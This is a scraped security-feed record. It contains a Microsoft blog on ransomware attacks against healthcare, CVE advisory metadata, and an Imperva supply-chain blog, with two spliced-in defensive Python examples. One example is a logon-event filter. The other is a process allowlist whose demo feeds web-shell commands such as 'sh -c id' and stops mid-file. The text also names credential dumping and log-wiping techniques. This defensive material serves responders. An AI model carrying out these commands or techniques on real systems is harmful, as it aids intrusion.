Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. 
Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. 
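The two bullets under "Investigate affected endpoints and credentials" describe a concrete filter over Security-log 4624 events: Interactive (type 2) and RemoteInteractive, i.e. RDP (type 10) logons on an affected host from the earliest breach activity onward, plus Batch (type 4) and Service (type 5) logons in any timeframe, since those accounts' secrets are stored on the host. The Python below is an added example, not Microsoft's advanced hunting query: it applies that filter to a list of 4624 records and returns the accounts to treat as compromised. The records are constructed, and the assumed input shape is a JSON-style export carrying the event's `EventData` fields (`TargetUserName`, `TargetDomainName`, `LogonType`, `IpAddress`) plus `Computer` and an ISO 8601 `TimeCreated`; adapt the field names to whatever your SIEM or `Get-WinEvent` export produces.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Windows logon types as they appear in the LogonType field of event 4624.
INTERACTIVE_TYPES = {2, 10}     # 2 = Interactive (console), 10 = RemoteInteractive (RDP)
STORED_SECRET_TYPES = {4, 5}    # 4 = Batch (scheduled task), 5 = Service

# Earliest suspected breach activity; a constructed date for this example.
BREACH_START = datetime(2020, 3, 10, tzinfo=timezone.utc)

# Constructed 4624/4625 records in the shape of a JSON export of the Security log.
EVENTS = [
    {"EventID": 4624, "TimeCreated": "2020-02-01T03:00:00+00:00", "Computer": "FS01.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "svc_backup", "LogonType": 5, "IpAddress": "-"},
    {"EventID": 4624, "TimeCreated": "2020-03-01T08:15:00+00:00", "Computer": "FS01.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "jdoe", "LogonType": 10, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "TimeCreated": "2020-03-12T22:41:09+00:00", "Computer": "FS01.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "admin_da", "LogonType": 10, "IpAddress": "10.0.0.77"},
    {"EventID": 4624, "TimeCreated": "2020-03-12T22:42:30+00:00", "Computer": "FS01.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "jdoe", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "TimeCreated": "2020-03-12T22:45:00+00:00", "Computer": "FS01.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "FS01$", "LogonType": 5, "IpAddress": "-"},
    {"EventID": 4624, "TimeCreated": "2020-03-13T09:00:00+00:00", "Computer": "WS07.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "admin_da", "LogonType": 2, "IpAddress": "-"},
    {"EventID": 4625, "TimeCreated": "2020-03-13T09:01:00+00:00", "Computer": "FS01.corp.example",
     "TargetDomainName": "CORP", "TargetUserName": "admin_da", "LogonType": 10, "IpAddress": "10.0.0.77"},
]


def exposed_accounts(events, affected_hosts, breach_start=BREACH_START):
    """Map DOMAIN\\user -> reasons it must be treated as compromised: a 4624 on an
    affected host with LogonType 2/10 at or after breach_start, or with
    LogonType 4/5 at any time (credentials stored in LSA Secrets)."""
    affected = {h.lower() for h in affected_hosts}
    reasons = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4624 or ev["Computer"].lower() not in affected:
            continue
        user = ev["TargetUserName"]
        if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
            continue                     # computer/anonymous logons: no user password to reset
        account = f"{ev['TargetDomainName']}\\{user}"
        logon_type = int(ev["LogonType"])
        when = datetime.fromisoformat(ev["TimeCreated"])
        if logon_type in INTERACTIVE_TYPES and when >= breach_start:
            reasons[account].add("interactive-logon-after-breach")
        elif logon_type in STORED_SECRET_TYPES:
            reasons[account].add("service-or-task-secret-on-host")
    return {acct: sorted(r) for acct, r in reasons.items()}


def reset_list(events, affected_hosts, breach_start=BREACH_START):
    """Accounts to reset, most exposed first (more reasons, then by name)."""
    found = exposed_accounts(events, affected_hosts, breach_start)
    return sorted(found, key=lambda a: (-len(found[a]), a))


if __name__ == "__main__":
    for acct, why in exposed_accounts(EVENTS, ["fs01.corp.example"]).items():
        print(f"{acct:20} {', '.join(why)}")
```

Network logons (type 3) are deliberately left out, matching the guidance above, and a type 2/10 logon before `breach_start` is ignored as well; if the breach start is uncertain, move it earlier rather than later, since a missed account is an attacker's way back in.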
[Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. 
Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. 
Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) to assess your security posture and get recommended improvement actions, guidance, and controls.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity:\n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences, in this time of global crisis, of the service disruption their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and at abusing security misconfigurations, and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. 
And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protection (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Windows 10 platform security features like address space layout randomization (ASLR) and Control Flow Guard (CFG), together with hardware-backed protections, harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. 
On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For severe cases, customers can engage services like the [Microsoft Detection and Response Team (DART)](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n_Microsoft Threat Protection Intelligence Team_\n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools, and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure VPN) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust 
Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevtutil, deletion of the USN journal using fsutil, and wiping of free disk space using cipher.exe /w\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security software using Process Hacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", 
"title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:22:10", "description": "A remote code execution vulnerability exists in the Widget Connector component of Atlassian Confluence and Data Center. A remote attacker can exploit this issue by sending a specially crafted packet to the target server. 
Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence and Data Center Remote Code Execution (CVE-2019-3396)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-16T00:00:00", "id": "CPAI-2019-0506", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:20:22", "description": "An information disclosure vulnerability exists in Cisco RV320 and RV325 Routers. 
Successful exploitation of this vulnerability would allow remote attackers to gain access to sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-08-05T00:00:00", "type": "checkpoint_advisories", "title": "Cisco RV320 and RV325 Routers Information Disclosure (CVE-2019-1653)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2019-08-12T00:00:00", "id": "CPAI-2019-0076", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:17:58", "description": "A directory traversal vulnerability exists in multiple Citrix products. 
Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "checkpoint_advisories", "title": "Citrix Multiple Products Directory Traversal (CVE-2019-19781)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-26T00:00:00", "id": "CPAI-2019-1653", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:24:12", "description": "A command injection vulnerability exists in Cisco RV320 and RV325 routers. An attacker can exploit this vulnerability by sending an authenticated HTTP request to the web-based management interface. 
An attacker could then gain the ability to arbitrarily execute code on the machine.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-01-27T00:00:00", "type": "checkpoint_advisories", "title": "Cisco RV320 Command Injection (CVE-2019-1652)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652"], "modified": "2019-02-04T00:00:00", "id": "CPAI-2019-0073", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-04-22T20:29:34", "description": "In [Part 1](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>) of this series, we explained how and why our software supply chain transfers an extraordinary amount of risk downstream to the organizations and users that trust and depend on it. 
We also presented evidence suggesting that 2021 may well be the year of the [Software Supply Chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>).\n\nLast time we described the most sophisticated of the supply chain attack methods, a [Vendor Compromise](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>). In this post, we cover the exploitation of third-party applications.\n\n### Exploitation of Third Party Applications\n\nAttacks targeting "[zero-days](<https://www.imperva.com/learn/application-security/zero-day-exploit/>)," or unpatched security bugs, in commonly used third-party applications are another example of the risks we assume from our software supply chain.\n\nCreating software is a challenging process. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database.\n\nThe [recent attacks on the Microsoft Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell. A web shell is typically an additional web page that the attacker uploads to a website. If the attacker can modify a web page on the server, the web shell may be embedded in an existing page. 
The additional or modified page contains code that allows the attacker to run arbitrary operating system commands on the web server, read files in the filesystem, install malware, etc. A web shell offers capabilities similar to a backdoor without having to establish an additional network connection to the web server, because it is reached over the same inbound HTTP(S) path as the application itself.\n\nCompounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Employing a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) to reduce the gap is a common strategy. Even the best WAFs require time to adapt, however, either with a new signature update (that must be developed, tested, and deployed), with an adjustment to a machine learning model, or with manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each organization\u2019s environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nThe race to mitigate zero-day attacks through traditional means is increasingly difficult to win. For example, a Zoho ManageEngine Desktop Central zero-day vulnerability (CVE-2020-10189) [was broadly exploited within days](<https://www.tenable.com/blog/cve-2020-10189-deserialization-vulnerability-in-zoho-manageengine-desktop-central-10-patched>) of its public disclosure.\n\n### Imperva RASP\n\nImperva [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a compelling way forward. Delivered as a lightweight software plugin, RASP attaches to virtually any type of application, whether third-party, open-source or bespoke. 
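The runtime hook that a RASP-style control relies on against the web-shell behavior described above (arbitrary OS commands launched from inside the web application), as an added Python example. It is not Imperva's product code: it patches `subprocess.Popen` in-process so that only an explicit allowlist of programs may be spawned, refusing shells and `shell=True`, which is the positive-security model in miniature. The allowlist, the stand-in helper program and the scenarios in `demo()` are constructed for the example.

```python
"""Added example (not Imperva's RASP): a minimal in-process execution guard.

A web shell that lands inside the application still has to ask the runtime to
spawn a process. The guard replaces subprocess.Popen with a subclass that
consults an allowlist of exact program paths and refuses shells and shell=True,
so "sh -c <payload>" fails even though the attacker already has code execution
inside the app. Real RASP products hook far lower (the language runtime or libc),
which this toy does not: os.system()/os.exec* would bypass it.
"""
import os
import subprocess
import sys
from typing import Iterable, List

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}


class BlockedExecution(PermissionError):
    """Raised instead of spawning a process the policy does not allow."""


class ExecGuard:
    def __init__(self, allowed_programs: Iterable[str]) -> None:
        # Exact, normalized paths: a basename match would let "./tar" impersonate /usr/bin/tar.
        self.allowed = {os.path.normcase(p) for p in allowed_programs}
        self.blocked: List[str] = []          # audit trail of refused launches
        self._orig_popen = None

    def is_allowed(self, args, shell: bool = False) -> bool:
        """Policy decision only; pure so it can be unit-tested without spawning anything."""
        if shell or isinstance(args, (str, bytes)):
            return False                       # string commands are shell-interpreted or ambiguous
        if not args:
            return False
        program = str(args[0])
        if os.path.basename(program).lower() in SHELLS:
            return False                       # never let the app reach a shell, whatever the path
        return os.path.normcase(program) in self.allowed

    def install(self) -> "ExecGuard":
        guard = self
        original = subprocess.Popen
        self._orig_popen = original

        class GuardedPopen(original):          # subprocess.run/call/check_output all go through Popen
            def __init__(self, args, *a, **kw):
                if not guard.is_allowed(args, shell=bool(kw.get("shell"))):
                    guard.blocked.append(repr(args))
                    raise BlockedExecution(f"execution policy refused {args!r}")
                super().__init__(args, *a, **kw)

        subprocess.Popen = GuardedPopen
        return self

    def uninstall(self) -> None:
        if self._orig_popen is not None:
            subprocess.Popen = self._orig_popen
            self._orig_popen = None


def try_run(argv, **kw) -> str:
    """What a request handler would see: either the helper's output or a refusal."""
    try:
        completed = subprocess.run(argv, capture_output=True, text=True, **kw)
        return "ran:" + completed.stdout.strip()
    except BlockedExecution:
        return "blocked"


def demo() -> List[str]:
    # The interpreter stands in for the one helper binary the app legitimately spawns (assumption).
    guard = ExecGuard([sys.executable]).install()
    try:
        return [
            try_run([sys.executable, "-c", "print('pong')"]),   # allowlisted helper
            try_run(["sh", "-c", "id"]),                         # classic web-shell primitive
            try_run("whoami", shell=True),                       # shell=True string command
            try_run(["/usr/bin/whoami"]),                        # real binary, not on the allowlist
        ]
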